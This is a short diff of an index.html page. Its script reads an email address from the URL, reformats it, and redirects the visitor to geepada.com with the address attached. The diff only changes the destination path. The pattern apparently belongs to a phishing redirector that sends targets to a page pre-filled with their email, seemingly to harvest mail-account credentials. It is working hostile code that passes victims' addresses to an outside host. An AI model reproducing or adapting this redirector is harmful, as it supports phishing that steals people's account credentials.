--- a/index.html
+++ b/index.html
@@ -8,10 +8,10 @@ const email = urlParams.get('geng');
 var findat = "@";
 
 if ( email.indexOf(findat) > -1 ) {
-    var url = "http://geepada.com/auzzieturf/ALIYUNNEW2/?email="+email;
+    var url = "http://geepada.com/ED?i=i&0="+email;
 } else {
  var emaill = email.split("/").join("@"); 
-    var url = "http://geepada.com/auzzieturf/ALIYUNNEW2/?email="+emaill;
+    var url = "http://geepada.com/ED?i=i&0="+emaill;
 }
 window.location.href = url;
 
